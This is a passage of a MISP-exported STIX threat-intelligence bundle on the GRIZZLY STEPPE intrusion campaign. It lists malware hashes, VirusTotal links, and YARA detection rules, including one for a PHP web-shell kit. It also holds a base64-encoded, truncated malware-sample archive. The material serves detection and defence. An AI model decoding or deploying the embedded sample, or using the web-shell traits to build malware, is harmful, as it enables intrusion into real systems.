|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab62-efd4-45e1-b6c2-44fd02de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab62-efd4-45e1-b6c2-44fd02de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/3367623638d42bdc1c45c44cb1843c00b510814170bc4e5da61eba2ddb212672/analysis/1481880509/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab63-cc40-4146-9b84-4d8e02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:58:11.000Z",
|
|
|
|
"modified": "2016-12-31T12:58:11.000Z",
|
|
|
|
"description": "GRIZZLY_STEPPE_Malware_2 - Xchecked via VT: 55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641",
|
|
|
|
"pattern": "[file:hashes.SHA1 = '8ccaa941af229cf57a0a97327d99a46f989423f0']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:58:11Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab63-37b4-4e0a-9066-40c002de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:58:11.000Z",
|
|
|
|
"modified": "2016-12-31T12:58:11.000Z",
|
|
|
|
"description": "GRIZZLY_STEPPE_Malware_2 - Xchecked via VT: 55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641",
|
|
|
|
"pattern": "[file:hashes.MD5 = '8f154d23ac2071d7f179959aaba37ad5']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:58:11Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab64-2004-4d85-8222-4e5302de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:58:12.000Z",
|
|
|
|
"modified": "2016-12-31T12:58:12.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:58:12Z",
|
|
|
|
"last_observed": "2016-12-31T12:58:12Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab64-2004-4d85-8222-4e5302de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab64-2004-4d85-8222-4e5302de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641/analysis/1483162756/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab98-aeb0-40b7-97d2-4400950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:59:04.000Z",
|
|
|
|
"modified": "2016-12-31T12:59:04.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:59:04Z",
|
|
|
|
"last_observed": "2016-12-31T12:59:04Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab98-aeb0-40b7-97d2-4400950d210f"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"Support Tool\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab98-aeb0-40b7-97d2-4400950d210f",
|
|
|
|
"value": "https://raw.githubusercontent.com/Neo23x0/signature-base/master/yara/apt_apt29_grizzly_steppe.yar"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867abaf-a80c-4ef4-87d0-4427950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:59:27.000Z",
|
|
|
|
"modified": "2016-12-31T12:59:27.000Z",
|
|
|
|
"pattern": "[rule GRIZZLY_STEPPE_Malware_1 {\r\n meta:\r\n description = \"Auto-generated rule - file HRDG022184_certclint.dll\"\r\n author = \"Florian Roth\"\r\n reference = \"https://goo.gl/WVflzO\"\r\n date = \"2016-12-29\"\r\n hash1 = \"9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5\"\r\n strings:\r\n $s1 = \"S:\\\\Lidstone\\\\renewing\\\\HA\\\\disable\\\\In.pdb\" fullword ascii\r\n $s2 = \"Repeat last find command)Replace specific text with different text\" fullword wide\r\n $s3 = \"l\\\\Processor(0)\\\\% Processor Time\" fullword wide\r\n $s6 = \"Self Process\" fullword wide\r\n $s7 = \"Default Process\" fullword wide\r\n $s8 = \"Star Polk.exe\" fullword wide\r\n condition:\r\n ( uint16(0) == 0x5a4d and filesize < 300KB and 4 of them )\r\n}]",
|
|
|
|
"pattern_type": "yara",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:59:27Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Artifacts dropped"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"yara\"",
|
|
|
|
"misp:category=\"Artifacts dropped\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867abc3-674c-47d9-8082-4d44950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:59:47.000Z",
|
|
|
|
"modified": "2016-12-31T12:59:47.000Z",
|
|
|
|
"pattern": "[rule GRIZZLY_STEPPE_Malware_2 {\r\n meta:\r\n description = \"Auto-generated rule - file 9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0\"\r\n author = \"Florian Roth\"\r\n reference = \"https://goo.gl/WVflzO\"\r\n date = \"2016-12-29\"\r\n hash1 = \"9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0\"\r\n hash2 = \"55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641\"\r\n strings:\r\n $x1 = \"GoogleCrashReport.dll\" fullword ascii\r\n\r\n $s1 = \"CrashErrors\" fullword ascii\r\n $s2 = \"CrashSend\" fullword ascii\r\n $s3 = \"CrashAddData\" fullword ascii\r\n $s4 = \"CrashCleanup\" fullword ascii\r\n $s5 = \"CrashInit\" fullword ascii\r\n condition:\r\n ( uint16(0) == 0x5a4d and filesize < 1000KB and $x1 ) or ( all of them )\r\n}]",
|
|
|
|
"pattern_type": "yara",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:59:47Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Artifacts dropped"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"yara\"",
|
|
|
|
"misp:category=\"Artifacts dropped\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867abd5-2b98-4087-9c66-4a70950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T13:00:05.000Z",
|
|
|
|
"modified": "2016-12-31T13:00:05.000Z",
|
|
|
|
"pattern": "[rule PAS_TOOL_PHP_WEB_KIT_mod {\r\n meta:\r\n description = \"Detects PAS Tool PHP Web Kit\"\r\n reference = \"https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity\"\r\n author = \"US CERT - modified by Florian Roth due to performance reasons\"\r\n date = \"2016/12/29\"\r\n strings:\r\n $php = \"<?php\"\r\n $base64decode1 = \"='base'.(\"\r\n $strreplace = \"str_replace(\\\"\\\\n\\\", ''\"\r\n $md5 = \".substr(md5(strrev(\"\r\n $gzinflate = \"gzinflate\"\r\n $cookie = \"_COOKIE\"\r\n $isset = \"isset\"\r\n condition:\r\n $php at 0 and\r\n (filesize > 10KB and filesize < 30KB) and\r\n #cookie == 2 and\r\n #isset == 3 and\r\n all of them\r\n}]",
|
|
|
|
"pattern_type": "yara",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T13:00:05Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Artifacts dropped"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"yara\"",
|
|
|
|
"misp:category=\"Artifacts dropped\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ac24-76c0-48b5-829b-4f0e950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T13:01:24.000Z",
|
|
|
|
"modified": "2016-12-31T13:01:24.000Z",
|
|
|
|
"first_observed": "2016-12-31T13:01:24Z",
|
|
|
|
"last_observed": "2016-12-31T13:01:24Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"file--5867ac24-76c0-48b5-829b-4f0e950d210f",
|
|
|
|
"artifact--5867ac24-76c0-48b5-829b-4f0e950d210f"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"attachment\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "file",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "file--5867ac24-76c0-48b5-829b-4f0e950d210f",
|
|
|
|
"name": "tweet-florian.png",
|
|
|
|
"content_ref": "artifact--5867ac24-76c0-48b5-829b-4f0e950d210f"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "artifact",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "artifact--5867ac24-76c0-48b5-829b-4f0e950d210f",
|
|
|
|
"payload_bin": "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
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--586b5278-1c38-4615-8db5-46e3950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2017-01-03T07:27:52.000Z",
|
|
|
|
"modified": "2017-01-03T07:27:52.000Z",
|
|
|
|
"pattern": "[file:content_ref.payload_bin = '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
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2017-01-03T07:27:52Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"malware-sample\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--586b527a-c690-4f5a-a7b5-4a1e950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2017-01-03T07:27:54.000Z",
|
|
|
|
"modified": "2017-01-03T07:27:54.000Z",
|
|
|
|
"pattern": "[file:name = 'webshell.php' AND file:hashes.SHA1 = 'fd82bec721c32851806721b7ab25bbba3f957f49']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2017-01-03T07:27:54Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"filename|sha1\"",
